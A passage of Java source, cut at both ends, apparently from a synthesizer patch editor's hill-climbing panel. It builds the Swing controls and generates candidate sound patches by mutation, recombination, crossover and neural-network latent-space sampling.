(Model)(currentModels[_i].clone()); } }); doItems[13] = new JMenuItem("Archive to s"); doItems[13].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 2] = (Model)(currentModels[_i].clone()); } }); doItems[14] = new JMenuItem("Archive to t"); doItems[14].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 3] = (Model)(currentModels[_i].clone()); } }); doItems[15] = new JMenuItem("Archive to u"); doItems[15].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 4] = (Model)(currentModels[_i].clone()); } }); doItems[16] = new JMenuItem("Archive to v"); doItems[16].addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { currentModels[NUM_CANDIDATES + 5] = (Model)(currentModels[_i].clone()); } }); PushButton options = new PushButton("Options", doItems); options.getButton().setFocusable(false); vbox.add(options); return vbox; } public HillClimb(final Synth synth) { super(synth); method = new JComboBox(synth instanceof ProvidesNN ? new String[] { "Hill-Climber", "Constrictor", "NN Hill-Climber" } : new String[] { "Hill-Climber", "Constrictor" }); blank = new Blank(); addAncestorListener ( new AncestorListener () { public void ancestorAdded ( AncestorEvent event ) { requestFocusInWindow(); } public void ancestorRemoved ( AncestorEvent event ) { // will get removed } public void ancestorMoved ( AncestorEvent event ) { // don't care } } ); setFocusable(true); addKeyListener(new KeyListener() { public void keyPressed(KeyEvent e) { } public void keyReleased(KeyEvent e) { } public void keyTyped(KeyEvent e) { char c = e.getKeyChar(); if (c >= 'a' && c <= 'p') { int p = (int)(c - 'a'); plays[p].perform(); } else if (c >= 'A' && c <= 'P' && NUM_CANDIDATES == 32) { int p = (int)(c - 'A' + 16); plays[p].perform(); } else if ((c >= 'q' && c <= 'v')) { int p = (int)(c - 'q' + NUM_CANDIDATES); plays[p].perform(); } else if (c =='z') { int p = (int)(NUM_MODELS - 1); plays[p].perform(); } else if (c == ' ') { climb.perform(); } else if (c == KeyEvent.VK_BACK_SPACE) { back.perform(); } else if (c == KeyEvent.VK_ENTER) { retry.perform(); } else if (c >= '1' && c <= '3') { ratings[lastPlayedSound()][(int)(c - '1')].setSelected(true); } } }); ButtonGroup one = new ButtonGroup(); ButtonGroup two = new ButtonGroup(); ButtonGroup three = new ButtonGroup(); VBox top = new VBox(); HBox toprow = new HBox(); add(top, BorderLayout.CENTER); // add globals Category panel = new Category(null, "Iteration 1", Style.COLOR_GLOBAL()); iterations = panel; HBox iterationsBox = new HBox(); VBox vbox = new VBox(); // has to be first so others can have their size based on it back = new PushButton("Back Up") { public void perform() { pop(); resetCurrentPlay(); } }; back.getButton().setFocusable(false); outerBox = new VBox(); iterationsBox.add(outerBox); hillClimbBox = new VBox(); climb = new PushButton("Climb") { public void perform() { if (method.getSelectedIndex() == 2) // NN Climb { climbNN(); } else { climb(); } resetCurrentPlay(); } }; climb.getButton().setPreferredSize(back.getButton().getPreferredSize()); climb.getButton().setFocusable(false); hillClimbBox.add(climb); String s = synth.getLastX("HillClimbRate", synth.getClass().getName()); hillClimbRate = new LabelledDial("Mutation Rate", blank, "hillclimbrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 
100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "HillClimbRate", synth.getClass().getName()); } }; int v = INITIAL_HILL_CLIMB_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_HILL_CLIMB_RATE; hillClimbRate.setState(v); blank.getModel().set("hillclimbrate", v); hillClimbBox.add(hillClimbRate); constrictBox = new VBox(); constrict = new PushButton("Constrict") { public void perform() { constrict(); resetCurrentPlay(); } }; constrict.getButton().setPreferredSize(back.getButton().getPreferredSize()); constrict.getButton().setFocusable(false); constrictBox.add(constrict); s = synth.getLastX("ConstrictRate", synth.getClass().getName()); // we don't do this one anyway constrictRate = new LabelledDial("Mutation Rate", blank, "constrictrate", Style.COLOR_GLOBAL(), 0, 100) { public String map(int val) { double v = ((val / 100.0) * (val / 100.0) * (val / 100.0)) * 100; if (v == 100) return "100.0"; else if (v >= 10.0) return String.format("%.2f", v); else return String.format("%.3f", v); } public void update(String key, Model model) { super.update(key, model); synth.setLastX("" + model.get(key), "ConstrictRate", synth.getClass().getName()); } }; v = INITIAL_CONSTRICT_RATE; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 100) v = INITIAL_CONSTRICT_RATE; constrictRate.setState(v); blank.getModel().set("constrictrate", v); constrictBox.add(constrictRate); vbox = new VBox(); retry = new PushButton("Retry") { public void perform() { again(); resetCurrentPlay(); } }; retry.getButton().setPreferredSize(back.getButton().getPreferredSize()); retry.getButton().setFocusable(false); vbox.add(retry); // add the aforementioned Back up button vbox.add(back); reset = new PushButton("Reset...", new String[] { "From Original Patch", "From Morph", "From Nudge Targets", "From First Four Candidates", "From First Six Candidates" }) { public void perform(int val) { if (method.getSelectedIndex() == 2) // NN Climb { Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end Model model = (val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? synth.morph.current : null); produceNN(random, keys, weight, model); } else { initialize(val == OPERATION_SEED_FROM_PATCH ? synth.getModel() : val == OPERATION_SEED_FROM_MORPH ? 
synth.morph.current : null, val); } resetCurrentPlay(); } }; reset.getButton().setPreferredSize(back.getButton().getPreferredSize()); reset.getButton().setFocusable(false); vbox.add(reset); iterationsBox.add(vbox); panel.add(iterationsBox, BorderLayout.CENTER); s = synth.getLastX("HillClimbMethod", synth.getClass().getName()); method.setFont(Style.SMALL_FONT()); method.putClientProperty("JComponent.sizeVariant", "small"); method.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { int m = method.getSelectedIndex(); synth.setLastX("" + m, "HillClimbMethod", synth.getClass().getName()); setMethod(m); } }); v = 0; if (s != null) try { v = Integer.parseInt(s); } catch (Exception e) { Synth.handleException(e); } if (v < 0 || v > 2) v = 0; // clear NN if (v == 2 && !(synth instanceof ProvidesNN)) v = 1; if (v == 0 || v == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } method.setSelectedIndex(v); JLabel methodLabel = new JLabel("Method: "); methodLabel.setForeground(Style.TEXT_COLOR()); methodLabel.setFont(Style.SMALL_FONT()); methodLabel.putClientProperty("JComponent.sizeVariant", "small"); methodLabel.setOpaque(false); // for windows HBox eb = new HBox(); eb.add(methodLabel); eb.add(method); // we do addLast rather than add to overcome the stupid OS X "Smoo..." bug. bigger = new JCheckBox("Big"); bigger.setFocusable(false); bigger.setOpaque(false); // for windows bigger.setForeground(Style.TEXT_COLOR()); bigger.setFont(Style.SMALL_FONT()); bigger.putClientProperty("JComponent.sizeVariant", "small"); s = synth.getLastX("HillClimbBigger", synth.getClass().getName()); bigger.addActionListener(new ActionListener() { public void actionPerformed(ActionEvent e) { setBigger(bigger.isSelected()); } }); boolean bb = false; if (s != null) try { bb = (s.equals("true")); } catch (Exception e) { Synth.handleException(e); } bigger.setSelected(bb); eb.addLast(bigger); panel.add(eb, BorderLayout.NORTH); toprow.add(panel); panel = new Category(null, "Archive", Style.COLOR_A()); HBox hbox = new HBox(); panel.add(hbox); for(int i = 0; i < ARCHIVE_SIZE; i++) { vbox = buildCandidate(NUM_CANDIDATES + i); hbox.add(vbox); } panel.add(hbox); toprow.addLast(panel); top.add(toprow); // Add Candidates panel = new Category(null, "Candidates", Style.COLOR_B()); hbox = new HBox(); candidates = new VBox(); for(int i = 0; i < NUM_CANDIDATES; i++) { vbox = buildCandidate(i); hbox.add(vbox); if (i % 8 == 7) { VBox vv = new VBox(); if (i != 7) vv.add(Strut.makeVerticalStrut(20)); vv.add(hbox); hbox = new HBox(); if (i == 23) extraCandidates1 = vv; else if (i == 31) extraCandidates2 = vv; else candidates.add(vv); } } panel.add(candidates, BorderLayout.WEST); HBox hb = new HBox(); hb.add(panel); VBox currentAndNone = new VBox(); // Add Current panel = new Category(null, "Current", Style.COLOR_C()); vbox = buildCandidate(NUM_MODELS - 1); HBox currentHBox = new HBox(); currentHBox.add(vbox); panel.add(currentHBox); currentAndNone.add(panel); // Add None panel = new Category(null, "None", Style.COLOR_C()); vbox = new VBox(); Box b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][0] = new JRadioButton("1")); ratings[NUM_MODELS][0].setFocusable(false); ratings[NUM_MODELS][0].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][0].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][0].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][0].setOpaque(false); // for windows 
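/* ratings[NUM_MODELS] is the "None" column: its three radio buttons share the 1st/2nd/3rd-best ButtonGroups with every candidate, so selecting one clears that rank from all candidates; climb(), constrict(), pop() and initialize() reselect them to reset the rankings after each iteration. */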
b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][1] = new JRadioButton("2")); ratings[NUM_MODELS][1].setFocusable(false); ratings[NUM_MODELS][1].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][1].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][1].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][1].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); b = new Box(BoxLayout.X_AXIS); b.setBackground(Style.BACKGROUND_COLOR()); b.add(Box.createGlue()); b.add(ratings[NUM_MODELS][2] = new JRadioButton("3")); ratings[NUM_MODELS][2].setFocusable(false); ratings[NUM_MODELS][2].setForeground(Style.TEXT_COLOR()); ratings[NUM_MODELS][2].setFont(Style.SMALL_FONT()); ratings[NUM_MODELS][2].putClientProperty("JComponent.sizeVariant", "small"); ratings[NUM_MODELS][2].setOpaque(false); // for windows b.add(Box.createGlue()); vbox.add(b); VBox bar = new VBox(); bar.addBottom(vbox); HBox foo = new HBox(); foo.add(bar); foo.add(Strut.makeHorizontalStrut(40)); panel.add(foo); currentAndNone.add(panel); hb.addLast(currentAndNone); top.add(hb); for(int i = 0; i < ratings.length; i++) { one.add(ratings[i][0]); two.add(ratings[i][1]); three.add(ratings[i][2]); } for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); setMethod(method.getSelectedIndex()); setBigger(bb); } public void setBigger(boolean bigger) { candidates.remove(extraCandidates1); candidates.remove(extraCandidates2); if (bigger) { candidates.add(extraCandidates1); candidates.add(extraCandidates2); } candidates.revalidate(); candidates.repaint(); synth.setLastX("" + bigger, "HillClimbBigger", synth.getClass().getName()); } public static final int UPDATE_SOUND_RATE = 1; int updateSoundTick = 0; Model backup = null; boolean isShowingPane() { return (synth.hillClimbPane != null && synth.tabs.getSelectedComponent() == synth.hillClimbPane); } public void updateSound() { updateSoundTick++; if (updateSoundTick >= UPDATE_SOUND_RATE) updateSoundTick = 0; if (updateSoundTick == 0) { if (isShowingPane()) { for(int i = 0; i < NUM_MODELS; i++) { plays[i].getButton().setForeground(new JButton().getForeground()); plays[i].getButton().setText(titleForButton(i)); } if (temporaryPlay >= 0) { plays[temporaryPlay].getButton().setForeground(Color.RED); plays[temporaryPlay].getButton().setText("<HTML><B>" + titleForButton(temporaryPlay) + "</b></HTML>"); backup = synth.model; synth.model = currentModels[temporaryPlay]; synth.sendAllParameters(); temporaryPlay = -1; } else { currentPlay++; if (currentPlay >= NUM_CANDIDATES || currentPlay >= 16 && !bigger.isSelected()) currentPlay = 0; plays[currentPlay].getButton().setForeground(Color.RED); plays[currentPlay].getButton().setText("<HTML><B>" + titleForButton(currentPlay) + "</b></HTML>"); // change the model, send all parameters, maybe play a note, // and then restore the model. 
backup = synth.model; synth.model = currentModels[currentPlay]; synth.sendAllParameters(); } } } } void setMethod(int method) { boolean c = (method == 0 || method == 2); climb.getButton().setEnabled(c); constrict.getButton().setEnabled(!c); for(int i = 0; i < ratings.length; i++) for(int j = 0; j < ratings[i].length; j++) if (ratings[i][j] != null) ratings[i][j].setEnabled(c); for(int i = 0; i < selected.length; i++) if (selected[i] != null) selected[i].setEnabled(!c); hillClimbRate.setEnabled(c); constrictRate.setEnabled(!c); this.method.setSelectedIndex(method); outerBox.removeAll(); if (method == 0 || method == 2) { outerBox.add(hillClimbBox); } else { outerBox.add(constrictBox); } outerBox.revalidate(); repaint(); } int lastPlayedSound() { if (temporaryPlay >=0) return temporaryPlay; else return currentPlay; } public void postUpdateSound() { repaint(); if (backup != null) synth.model = backup; backup = null; } boolean startedUp = false; public void startup() { if (!startedUp) { resetCurrentPlay(); if (!synth.isSendingTestNotes() && synth.morphTestNotes) { synth.doSendTestNotes(); } } startedUp = true; } public void shutdown() { if (startedUp) { synth.doSendAllSoundsOff(false); if (synth.isSendingTestNotes()) { synth.doSendTestNotes(); } if (synth.isRepeatingCurrentPatch()) { synth.doRepeatCurrentPatch(); } // restore patch synth.sendAllParameters(); } startedUp = false; } public void resetCurrentPlay() { currentPlay = NUM_CANDIDATES - 1; temporaryPlay = -1; } Model copy(Model model) { if (model != null) return model.copy(); else return null; } void again() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb): " + "Empty Stack"); return; } else if (operation == OPERATION_SEED_FROM_PATCH) { initialize(synth.getModel(), operation); } else if (operation == OPERATION_SEED_FROM_NUDGE || operation == OPERATION_SEED_FROM_FOUR || operation == OPERATION_SEED_FROM_SIX) { initialize(null, operation); } else if (operation == OPERATION_CLIMB) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climb(); } else if (operation == OPERATION_CONSTRICT) { /* State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) ratings[state.parentIndices[j]][j].setSelected(true); } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } */ pop(); constrict(); } else if (operation == OPERATION_CLIMB_NN) { /* // reset ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) 
{ selected[j].setSelected(state.parentsSelected[j]); } */ pop(); climbNN(); } } void pop() { if (stackEmpty()) { // uh oh... System.err.println("Warning (HillClimb) 2: " + "Empty Stack"); return; } else if (stackInitial()) { // do nothing ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); } else { ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); State state = popStack(); operation = state.operation; System.arraycopy(state.children, 0, currentModels, 0, state.children.length); for(int j = 0; j < state.parentIndices.length; j++) { if (state.parentIndices[j] != -1) { //System.err.println("Setting " + state.parentIndices[j] + " to " + j); ratings[state.parentIndices[j]][j].setSelected(true); } } for(int j = 0; j < state.parentsSelected.length; j++) { selected[j].setSelected(state.parentsSelected[j]); } iterations.setName("Iteration " + stack.size()); repaint(); } } public void startHillClimbing() { for(int i = NUM_CANDIDATES; i < NUM_CANDIDATES + ARCHIVE_SIZE; i++) { currentModels[i] = (Model)(synth.getModel().clone()); } currentModels[NUM_CANDIDATES + ARCHIVE_SIZE] = synth.getModel(); if (method.getSelectedIndex() == 2) { //System.out.println(method.getSelectedIndex()); Random random = synth.random; String[] keys = synth.getMutationKeys(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end produceNN(random, keys, weight, synth.getModel()); } else { initialize(synth.getModel(), OPERATION_SEED_FROM_PATCH); } } boolean[] getSelectedResults() { boolean[] sel = new boolean[NUM_CANDIDATES]; for(int i = 0; i < sel.length; i++) { sel[i] = selected[i].isSelected(); } return sel; } void initialize(Model seed, int operation) { // we need a model with NO callbacks stack.clear(); this.operation = operation; Random random = synth.random; String[] keys = synth.getMutationKeys(); switch(operation) { case OPERATION_SEED_FROM_PATCH: // Fall Thru case OPERATION_SEED_FROM_MORPH: { Model newSeed = seed.copy(); double weight = blank.getModel().get("hillclimbrate", 0) / 100.0; weight = weight * weight * weight; // make more sensitive at low end int numMutations = 1; for(int i = 0; i < NUM_CANDIDATES; i++) { currentModels[i] = newSeed.copy(); for(int j = 0; j < numMutations; j++) currentModels[i] = currentModels[i].mutate(random, keys, weight); if (i % 4 == 3) numMutations++; } for(int i = 0; i < selected.length; i++) selected[i].setSelected(true); } break; case OPERATION_SEED_FROM_NUDGE: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; for(int i = 0; i < 4; i++) currentModels[i] = (Model)(synth.nudge[i].clone()); int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_FOUR: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 4; for(int i = 0; i < 4; i++) for(int j = 0; j < 4; j++) { if (j == i) continue; currentModels[m++] = 
currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } // fill the next 16 for(int i = 16; i < 32; i++) { // pick two parents, try to make them different from one another int p1 = random.nextInt(16); int p2 = 0; for(int j = 0; j < 100; j++) { p2 = random.nextInt(16); if (p2 != p1) break; } currentModels[i] = currentModels[p1].copy().crossover(random, currentModels[p1], keys, weight); } } break; case OPERATION_SEED_FROM_SIX: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int m = 6; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; case OPERATION_SEED_FROM_LIBRARIAN: { double weight = blank.getModel().get("constrictrate", 0) / 100.0; int column = synth.librarian.getCurrentColumn(); int row = synth.librarian.getCurrentRow(); int len = synth.librarian.getCurrentLength(); if (len == 0) return; for(int i = 0; i < Math.min(len, 32); i++) { currentModels[i] = (Model)(synth.librarian.getLibrary().getModel(column - 1, row + i).clone()); } int m = len; for(int i = 0; i < 6; i++) for(int j = 0; j < 6; j++) { if (j == i) continue; if (m >= 32) break; currentModels[m++] = currentModels[i].copy().crossover(random, currentModels[j], keys, weight); } } break; } pushStack(new int[] {-1, -1, -1}, new Model[] { seed, null, null }, getSelectedResults(), currentModels); iterations.setName("Iteration " + stack.size()); ratings[NUM_MODELS][0].setSelected(true); ratings[NUM_MODELS][1].setSelected(true); ratings[NUM_MODELS][2].setSelected(true); repaint(); } void shuffle(Random random, Model[] array, int start, int len) { for (int i = len - 1; i > 0; i--) { int index = random.nextInt(i + 1); Model temp = array[start + index]; array[start + index] = array[start + i]; array[start + i] = temp; } } void produceNN(Random random, String[] keys, double weight, Model a) { if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } for(int i = 0; i < NUM_CANDIDATES; i++) { // A currentModels[i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, NUM_CANDIDATES); } void produceNN(Random random, String[] keys, double weight, Model a, Model b) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = ((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } for(int j = 0; j < numStages; j++) { for(int i = 0; i < STAGE_SIZE/2; i++) { // A currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = STAGE_SIZE/2; i < 3*STAGE_SIZE/4; i++) { // B currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); } for(int i = 3*STAGE_SIZE/4; i < STAGE_SIZE; i++) { // C currentModels[j*STAGE_SIZE + i] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produceNN(Random random, String[] keys, double weight, Model a, Model b, Model c) { int numStages = NUM_CANDIDATES / STAGE_SIZE; if(a.latentVector == null) { a.latentVector = 
((ProvidesNN)synth).encode(a); } if(b.latentVector == null) { b.latentVector = ((ProvidesNN)synth).encode(b); } if(c.latentVector == null) { c.latentVector = ((ProvidesNN)synth).encode(c); } for(int j = 0; j < numStages; j++) { // A currentModels[j*STAGE_SIZE + 0] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 1] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 2] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 3] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(a.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // B currentModels[j*STAGE_SIZE + 4] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 5] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 6] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(b.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // C currentModels[j*STAGE_SIZE + 7] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 8] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(c.latentVector, random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, B) currentModels[j*STAGE_SIZE + 9] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 10] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A, C) currentModels[j*STAGE_SIZE + 11] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 12] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(B, C) currentModels[j*STAGE_SIZE + 13] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); currentModels[j*STAGE_SIZE + 14] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); // Mean(A,B,C) currentModels[j*STAGE_SIZE + 15] = ((ProvidesNN)synth).decode(Network.shiftVectorGaussian(Network.vectorMean(a.latentVector, b.latentVector, c.latentVector), random, weight * ProvidesNN.WEIGHT_SCALING)); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } public static final double MUTATION_WEIGHT = 1.0; void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, c, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random 
random, String[] keys, double recombination, double weight, Model a, Model b, Model c, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); // A + C currentModels[stage + 1] = a.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); // A + (B + C) currentModels[stage + 2] = a.copy().recombine(random, b.copy().recombine(random, c, keys, recombination), keys, recombination).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - C currentModels[stage + 4] = a.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A currentModels[stage + 5] = a.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B currentModels[stage + 6] = b.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C currentModels[stage + 7] = c.copy().mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { // A - Z currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 9] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - A currentModels[stage + 10] = c.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - C currentModels[stage + 11] = b.copy().opposite(random, c, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // C - B currentModels[stage + 12] = c.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - Z currentModels[stage + 13] = b.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // C - Z currentModels[stage + 14] = c.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); // B + C currentModels[stage + 15] = b.copy().recombine(random, c, keys, recombination).mutate(random, keys, mutationWeight); } } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA) { int numStages = NUM_CANDIDATES / STAGE_SIZE; for(int i = 0; i < numStages; i++) { produce(random, keys, recombination, weight, a, b, oldA, i * STAGE_SIZE); } shuffle(random, currentModels, 0, STAGE_SIZE); shuffle(random, currentModels, STAGE_SIZE, STAGE_SIZE); } void produce(Random random, String[] keys, double recombination, double weight, Model a, Model b, Model oldA, int stage) { double mutationWeight = (stage/STAGE_SIZE + 1) * MUTATION_WEIGHT * weight; // A + B currentModels[stage + 0] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight); currentModels[stage + 1] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 2] = a.copy().recombine(random, b, keys, recombination).mutate(random, keys, mutationWeight).mutate(random, keys, 
mutationWeight).mutate(random, keys, mutationWeight); // A - B currentModels[stage + 3] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 4] = a.copy().opposite(random, b, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // B - A currentModels[stage + 5] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); currentModels[stage + 6] = b.copy().opposite(random, a, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight).mutate(random, keys, mutationWeight); // A - Z currentModels[stage + 7] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight); if ((stage + 8) < currentModels.length) { currentModels[stage + 8] = a.copy().opposite(random, oldA, keys, recombination, false).mutate(random, keys, mutationWeight).mutate(random, 